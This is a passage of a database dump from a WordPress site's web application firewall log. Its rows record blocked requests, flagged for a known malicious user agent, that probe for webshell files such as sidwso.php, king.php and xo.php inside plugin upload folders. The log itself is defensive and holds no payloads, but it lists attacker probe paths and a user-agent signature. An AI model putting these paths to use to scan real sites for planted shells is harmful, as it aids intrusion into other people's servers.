User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12052,1674833234.523649,1674833234.412100,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/shell20211028.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvc2hlbGwyMDIxMTAyOC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12053,1674833230.625525,1674833230.509000,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/sid/sidwso.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaWQvc2lkd3NvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12054,1674833227.824125,1674833227.706300,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/bala.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2JhbGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12055,1674841827.765998,1674841827.654000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/files/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL2ZpbGVzL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12056,1674841826.813603,1674841826.683400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/files/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL2ZpbGVzL2FicnV6aS5waHA0\",\"category\":\"brute-force\",\"ssl\":1}'),(12057,1674841826.047973,1674841825.940400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/files/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL2ZpbGVzL2FicnV6aS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12058,1674841825.547521,1674841825.435800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9TU0ZfV1BfVVBMT0FEU19QQVRIL2Nzdi9pbXBvcnQvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12059,1674841824.955013,1674841824.830800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/files/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC9maWxlcy9hYnJ1emkucGhwNA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12060,1674841823.870069,1674841823.760800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/files/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC9maWxlcy9raW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12061,1674841823.312629,1674841823.200900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/files/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC9maWxlcy9hYnJ1emkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12062,1674841822.671177,1674841822.537000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/files/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC9maWxlcy94by5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12063,1674841822.316495,1674841822.202500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12064,1674841821.769716,1674841821.662500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL3hvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12065,1674841821.127504,1674841820.988000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL2FicnV6aS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12066,1674841820.154918,1674841820.039800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL2FicnV6aS5waHA0\",\"category\":\"brute-force\",\"ssl\":1}'),(12067,1674841819.488238,1674841819.380100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12068,1674841818.856687,1674841818.747700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkva2luZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12069,1674841818.289692,1674841818.182700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYWJydXppLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12070,1674841817.444753,1674841817.310400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYWJydXppLnBocDQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(12071,1674841816.798363,1674841816.684500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9raW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12072,1674841815.956409,1674841815.842000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy94by5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12073,1674841814.919862,1674841814.810600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9hYnJ1emkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12074,1674841814.021071,1674841813.909400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9hYnJ1emkucGhwNA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12075,1674841812.908473,1674841812.784400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/king','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9raW5n\",\"category\":\"brute-force\",\"ssl\":1}'),(12076,1674841811.997721,1674841811.886800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 